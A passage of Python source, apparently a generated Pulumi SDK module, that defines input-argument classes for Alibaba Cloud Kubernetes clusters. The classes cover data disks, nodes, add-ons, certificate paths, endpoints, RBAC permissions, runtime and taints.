                 device: Optional[pulumi.Input[str]] = None,
                 encrypted: Optional[pulumi.Input[str]] = None,
                 kms_key_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 performance_level: Optional[pulumi.Input[str]] = None,
                 size: Optional[pulumi.Input[str]] = None,
                 snapshot_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] auto_snapshot_policy_id: Worker node data disk auto snapshot policy.
        :param pulumi.Input[str] category: The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
        :param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false. Default is `false`.
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
        :param pulumi.Input[str] size: The size of a data disk, at least 40. Unit: GiB.
        """
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("auto_snapshot_policy_id", auto_snapshot_policy_id),
                         ("category", category), ("device", device),
                         ("encrypted", encrypted), ("kms_key_id", kms_key_id),
                         ("name", name),
                         ("performance_level", performance_level),
                         ("size", size), ("snapshot_id", snapshot_id)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="autoSnapshotPolicyId")
    def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
        """
        Worker node data disk auto snapshot policy.
        """
        return pulumi.get(self, "auto_snapshot_policy_id")

    @auto_snapshot_policy_id.setter
    def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "auto_snapshot_policy_id", value)

    @property
    @pulumi.getter
    def category(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
        """
        return pulumi.get(self, "category")

    @category.setter
    def category(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "category", value)

    @property
    @pulumi.getter
    def device(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "device")

    @device.setter
    def device(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "device", value)

    @property
    @pulumi.getter
    def encrypted(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies whether to encrypt data disks. Valid values: true and false. Default is `false`.
        """
        return pulumi.get(self, "encrypted")

    @encrypted.setter
    def encrypted(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "encrypted", value)

    @property
    @pulumi.getter(name="kmsKeyId")
    def kms_key_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "kms_key_id")

    @kms_key_id.setter
    def kms_key_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_key_id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="performanceLevel")
    def performance_level(self) -> Optional[pulumi.Input[str]]:
        """
        Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
        """
        return pulumi.get(self, "performance_level")

    @performance_level.setter
    def performance_level(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "performance_level", value)

    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[str]]:
        """
        The size of a data disk, at least 40. Unit: GiB.
        """
        return pulumi.get(self, "size")

    @size.setter
    def size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size", value)

    @property
    @pulumi.getter(name="snapshotId")
    def snapshot_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "snapshot_id")

    @snapshot_id.setter
    def snapshot_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class EdgeKubernetesWorkerNodeArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: ID of the node.
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] private_ip: The private IP address of node.
        """
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("id", id), ("name", name),
                         ("private_ip", private_ip)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the node.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="privateIp")
    def private_ip(self) -> Optional[pulumi.Input[str]]:
        """
        The private IP address of node.
        """
        return pulumi.get(self, "private_ip")

    @private_ip.setter
    def private_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip", value)
@pulumi.input_type
class KubernetesAddonArgs:
    def __init__(__self__, *,
                 config: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("config", config), ("disabled", disabled),
                         ("name", name)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "config")

    @config.setter
    def config(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class KubernetesAutoscalerNodepoolArgs:
    """Autoscaler node-pool reference: id plus label/taint selectors."""

    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[str]] = None,
                 taints: Optional[pulumi.Input[str]] = None):
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("id", id), ("labels", labels), ("taints", taints)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter
    def taints(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "taints")

    @taints.setter
    def taints(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "taints", value)
@pulumi.input_type
class KubernetesCertificateAuthorityArgs:
    def __init__(__self__, *,
                 client_cert: Optional[pulumi.Input[str]] = None,
                 client_key: Optional[pulumi.Input[str]] = None,
                 cluster_cert: Optional[pulumi.Input[str]] = None):
        """
        Certificate material used to authenticate against the cluster.

        :param pulumi.Input[str] client_cert: The path of client certificate, like `~/.kube/client-cert.pem`.
        :param pulumi.Input[str] client_key: The path of client key, like `~/.kube/client-key.pem`.
        :param pulumi.Input[str] cluster_cert: The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("client_cert", client_cert),
                                ("client_key", client_key),
                                ("cluster_cert", cluster_cert)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter(name="clientCert")
    def client_cert(self) -> Optional[pulumi.Input[str]]:
        """
        The path of client certificate, like `~/.kube/client-cert.pem`.
        """
        return pulumi.get(self, "client_cert")

    @client_cert.setter
    def client_cert(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_cert", value)

    @property
    @pulumi.getter(name="clientKey")
    def client_key(self) -> Optional[pulumi.Input[str]]:
        """
        The path of client key, like `~/.kube/client-key.pem`.
        """
        return pulumi.get(self, "client_key")

    @client_key.setter
    def client_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_key", value)

    @property
    @pulumi.getter(name="clusterCert")
    def cluster_cert(self) -> Optional[pulumi.Input[str]]:
        """
        The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
        """
        return pulumi.get(self, "cluster_cert")

    @cluster_cert.setter
    def cluster_cert(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_cert", value)
@pulumi.input_type
class KubernetesConnectionsArgs:
    def __init__(__self__, *,
                 api_server_internet: Optional[pulumi.Input[str]] = None,
                 api_server_intranet: Optional[pulumi.Input[str]] = None,
                 master_public_ip: Optional[pulumi.Input[str]] = None,
                 service_domain: Optional[pulumi.Input[str]] = None):
        """
        Network endpoints exposed by the cluster.

        :param pulumi.Input[str] api_server_internet: API Server Internet endpoint.
        :param pulumi.Input[str] api_server_intranet: API Server Intranet endpoint.
        :param pulumi.Input[str] master_public_ip: Master node SSH IP address.
        :param pulumi.Input[str] service_domain: Service Access Domain.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("api_server_internet", api_server_internet),
                                ("api_server_intranet", api_server_intranet),
                                ("master_public_ip", master_public_ip),
                                ("service_domain", service_domain)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter(name="apiServerInternet")
    def api_server_internet(self) -> Optional[pulumi.Input[str]]:
        """
        API Server Internet endpoint.
        """
        return pulumi.get(self, "api_server_internet")

    @api_server_internet.setter
    def api_server_internet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server_internet", value)

    @property
    @pulumi.getter(name="apiServerIntranet")
    def api_server_intranet(self) -> Optional[pulumi.Input[str]]:
        """
        API Server Intranet endpoint.
        """
        return pulumi.get(self, "api_server_intranet")

    @api_server_intranet.setter
    def api_server_intranet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server_intranet", value)

    @property
    @pulumi.getter(name="masterPublicIp")
    def master_public_ip(self) -> Optional[pulumi.Input[str]]:
        """
        Master node SSH IP address.
        """
        return pulumi.get(self, "master_public_ip")

    @master_public_ip.setter
    def master_public_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "master_public_ip", value)

    @property
    @pulumi.getter(name="serviceDomain")
    def service_domain(self) -> Optional[pulumi.Input[str]]:
        """
        Service Access Domain.
        """
        return pulumi.get(self, "service_domain")

    @service_domain.setter
    def service_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_domain", value)
@pulumi.input_type
class KubernetesMasterNodeArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None):
        """
        Identity and addressing of a single master node.

        :param pulumi.Input[str] id: ID of the node.
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] private_ip: The private IP address of node.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("id", id),
                                ("name", name),
                                ("private_ip", private_ip)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the node.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="privateIp")
    def private_ip(self) -> Optional[pulumi.Input[str]]:
        """
        The private IP address of node.
        """
        return pulumi.get(self, "private_ip")

    @private_ip.setter
    def private_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip", value)
@pulumi.input_type
class KubernetesPermissionPermissionArgs:
    def __init__(__self__, *,
                 cluster: pulumi.Input[str],
                 role_name: pulumi.Input[str],
                 role_type: pulumi.Input[str],
                 is_custom: Optional[pulumi.Input[bool]] = None,
                 is_ram_role: Optional[pulumi.Input[bool]] = None,
                 namespace: Optional[pulumi.Input[str]] = None):
        """
        A single RBAC grant on a cluster.

        :param pulumi.Input[str] cluster: The ID of the cluster that you want to manage.
        :param pulumi.Input[str] role_name: Specifies the predefined role that you want to assign. Valid values `admin`, `ops`, `dev`, `restricted` and the custom cluster roles.
        :param pulumi.Input[str] role_type: The authorization type. Valid values `cluster`, `namespace`.
        :param pulumi.Input[bool] is_custom: Specifies whether to perform a custom authorization. To perform a custom authorization, set `role_name` to a custom cluster role.
        :param pulumi.Input[bool] is_ram_role: Specifies whether the permissions are granted to a RAM role. When `uid` is ram role id, the value of `is_ram_role` must be `true`.
        :param pulumi.Input[str] namespace: The namespace to which the permissions are scoped. This parameter is required only if you set role_type to namespace.
        """
        # Required fields are stored unconditionally.
        for field, supplied in (("cluster", cluster),
                                ("role_name", role_name),
                                ("role_type", role_type)):
            pulumi.set(__self__, field, supplied)
        # Optional fields are stored only when the caller provided them.
        for field, supplied in (("is_custom", is_custom),
                                ("is_ram_role", is_ram_role),
                                ("namespace", namespace)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def cluster(self) -> pulumi.Input[str]:
        """
        The ID of the cluster that you want to manage.
        """
        return pulumi.get(self, "cluster")

    @cluster.setter
    def cluster(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster", value)

    @property
    @pulumi.getter(name="roleName")
    def role_name(self) -> pulumi.Input[str]:
        """
        Specifies the predefined role that you want to assign. Valid values `admin`, `ops`, `dev`, `restricted` and the custom cluster roles.
        """
        return pulumi.get(self, "role_name")

    @role_name.setter
    def role_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "role_name", value)

    @property
    @pulumi.getter(name="roleType")
    def role_type(self) -> pulumi.Input[str]:
        """
        The authorization type. Valid values `cluster`, `namespace`.
        """
        return pulumi.get(self, "role_type")

    @role_type.setter
    def role_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "role_type", value)

    @property
    @pulumi.getter(name="isCustom")
    def is_custom(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether to perform a custom authorization. To perform a custom authorization, set `role_name` to a custom cluster role.
        """
        return pulumi.get(self, "is_custom")

    @is_custom.setter
    def is_custom(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_custom", value)

    @property
    @pulumi.getter(name="isRamRole")
    def is_ram_role(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the permissions are granted to a RAM role. When `uid` is ram role id, the value of `is_ram_role` must be `true`.
        """
        return pulumi.get(self, "is_ram_role")

    @is_ram_role.setter
    def is_ram_role(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_ram_role", value)

    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """
        The namespace to which the permissions are scoped. This parameter is required only if you set role_type to namespace.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)
@pulumi.input_type
class KubernetesRuntimeArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        """
        Container runtime selection for the cluster.

        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] version: Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("name", name), ("version", version)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class KubernetesTaintArgs:
    def __init__(__self__, *,
                 effect: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        A node taint expressed as its effect/key/value triple.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("effect", effect),
                                ("key", key),
                                ("value", value)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def effect(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "effect")

    @effect.setter
    def effect(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "effect", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class KubernetesWorkerDataDiskArgs:
    def __init__(__self__, *,
                 auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
                 category: Optional[pulumi.Input[str]] = None,
                 device: Optional[pulumi.Input[str]] = None,
                 encrypted: Optional[pulumi.Input[str]] = None,
                 kms_key_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 performance_level: Optional[pulumi.Input[str]] = None,
                 size: Optional[pulumi.Input[str]] = None,
                 snapshot_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] auto_snapshot_policy_id: Worker node data disk auto snapshot policy.
        :param pulumi.Input[str] category: The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
        :param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false.
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
        :param pulumi.Input[str] size: The size of a data disk, Its valid value range [40~32768] in GB. Unit: GiB.
        """
        # Each optional field is recorded only when the caller supplied it, so
        # an unset field stays absent from the input object.
        if auto_snapshot_policy_id is not None:
            pulumi.set(__self__, "auto_snapshot_policy_id", auto_snapshot_policy_id)
        if category is not None:
            pulumi.set(__self__, "category", category)
        if device is not None:
            pulumi.set(__self__, "device", device)
        if encrypted is not None:
            pulumi.set(__self__, "encrypted", encrypted)
        if kms_key_id is not None:
            pulumi.set(__self__, "kms_key_id", kms_key_id)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if performance_level is not None:
            pulumi.set(__self__, "performance_level", performance_level)
        if size is not None:
            pulumi.set(__self__, "size", size)
        if snapshot_id is not None:
            pulumi.set(__self__, "snapshot_id", snapshot_id)
    @property
    @pulumi.getter(name="autoSnapshotPolicyId")
    def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
        """
        Worker node data disk auto snapshot policy.
        """
        return pulumi.get(self, "auto_snapshot_policy_id")
    @auto_snapshot_policy_id.setter
    def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "auto_snapshot_policy_id", value)
    @property
    @pulumi.getter
    def category(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
        """
        return pulumi.get(self, "category")
    @category.setter
    def category(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "category", value)
    @property
    @pulumi.getter
    def device(self) -> Optional[pulumi.Input[str]]:
        """
        Device name of the data disk. Not documented in this schema —
        presumably an ECS device name such as `/dev/xvdb`; TODO confirm
        against the ACK API.
        """
        return pulumi.get(self, "device")
    @device.setter
    def device(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "device", value)
    @property
    @pulumi.getter
    def encrypted(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies whether to encrypt data disks. Valid values: true and false.
        """
        # NOTE(review): declared as a string input even though it carries
        # true/false values.
        return pulumi.get(self, "encrypted")
    @encrypted.setter
    def encrypted(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "encrypted", value)
    @property
    @pulumi.getter(name="kmsKeyId")
    def kms_key_id(self) -> Optional[pulumi.Input[str]]:
        """
        KMS key ID for the data disk. Presumably the key used when
        `encrypted` is true — TODO confirm against the ACK API.
        """
        return pulumi.get(self, "kms_key_id")
    @kms_key_id.setter
    def kms_key_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_key_id", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="performanceLevel")
    def performance_level(self) -> Optional[pulumi.Input[str]]:
        """
        Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
        """
        return pulumi.get(self, "performance_level")
    @performance_level.setter
    def performance_level(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "performance_level", value)
    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[str]]:
        """
        The size of a data disk, Its valid value range [40~32768] in GB. Unit: GiB.
        """
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size", value)
    @property
    @pulumi.getter(name="snapshotId")
    def snapshot_id(self) -> Optional[pulumi.Input[str]]:
        """
        Snapshot ID for the data disk. Presumably the snapshot the disk is
        created from — TODO confirm against the ACK API.
        """
        return pulumi.get(self, "snapshot_id")
    @snapshot_id.setter
    def snapshot_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class KubernetesWorkerNodeArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None):
        """
        Identity and addressing of a single worker node.

        :param pulumi.Input[str] id: ID of the node.
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] private_ip: The private IP address of node.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("id", id),
                                ("name", name),
                                ("private_ip", private_ip)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the node.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="privateIp")
    def private_ip(self) -> Optional[pulumi.Input[str]]:
        """
        The private IP address of node.
        """
        return pulumi.get(self, "private_ip")

    @private_ip.setter
    def private_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip", value)
@pulumi.input_type
class ManagedKubernetesAddonArgs:
    def __init__(__self__, *,
                 config: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        Input properties describing a single managed-cluster add-on.

        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("config", config),
                                ("disabled", disabled),
                                ("name", name)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "config")

    @config.setter
    def config(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ManagedKubernetesCertificateAuthorityArgs:
    def __init__(__self__, *,
                 client_cert: Optional[pulumi.Input[str]] = None,
                 client_key: Optional[pulumi.Input[str]] = None,
                 cluster_cert: Optional[pulumi.Input[str]] = None):
        """
        Certificate material used to authenticate against the managed cluster.

        :param pulumi.Input[str] client_cert: The path of client certificate, like `~/.kube/client-cert.pem`.
        :param pulumi.Input[str] client_key: The path of client key, like `~/.kube/client-key.pem`.
        :param pulumi.Input[str] cluster_cert: The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("client_cert", client_cert),
                                ("client_key", client_key),
                                ("cluster_cert", cluster_cert)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter(name="clientCert")
    def client_cert(self) -> Optional[pulumi.Input[str]]:
        """
        The path of client certificate, like `~/.kube/client-cert.pem`.
        """
        return pulumi.get(self, "client_cert")

    @client_cert.setter
    def client_cert(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_cert", value)

    @property
    @pulumi.getter(name="clientKey")
    def client_key(self) -> Optional[pulumi.Input[str]]:
        """
        The path of client key, like `~/.kube/client-key.pem`.
        """
        return pulumi.get(self, "client_key")

    @client_key.setter
    def client_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_key", value)

    @property
    @pulumi.getter(name="clusterCert")
    def cluster_cert(self) -> Optional[pulumi.Input[str]]:
        """
        The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
        """
        return pulumi.get(self, "cluster_cert")

    @cluster_cert.setter
    def cluster_cert(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_cert", value)
@pulumi.input_type
class ManagedKubernetesConnectionsArgs:
    def __init__(__self__, *,
                 api_server_internet: Optional[pulumi.Input[str]] = None,
                 api_server_intranet: Optional[pulumi.Input[str]] = None,
                 master_public_ip: Optional[pulumi.Input[str]] = None,
                 service_domain: Optional[pulumi.Input[str]] = None):
        """
        Network endpoints exposed by the managed cluster.

        :param pulumi.Input[str] api_server_internet: API Server Internet endpoint.
        :param pulumi.Input[str] api_server_intranet: API Server Intranet endpoint.
        :param pulumi.Input[str] master_public_ip: Master node SSH IP address.
        :param pulumi.Input[str] service_domain: Service Access Domain.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("api_server_internet", api_server_internet),
                                ("api_server_intranet", api_server_intranet),
                                ("master_public_ip", master_public_ip),
                                ("service_domain", service_domain)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter(name="apiServerInternet")
    def api_server_internet(self) -> Optional[pulumi.Input[str]]:
        """
        API Server Internet endpoint.
        """
        return pulumi.get(self, "api_server_internet")

    @api_server_internet.setter
    def api_server_internet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server_internet", value)

    @property
    @pulumi.getter(name="apiServerIntranet")
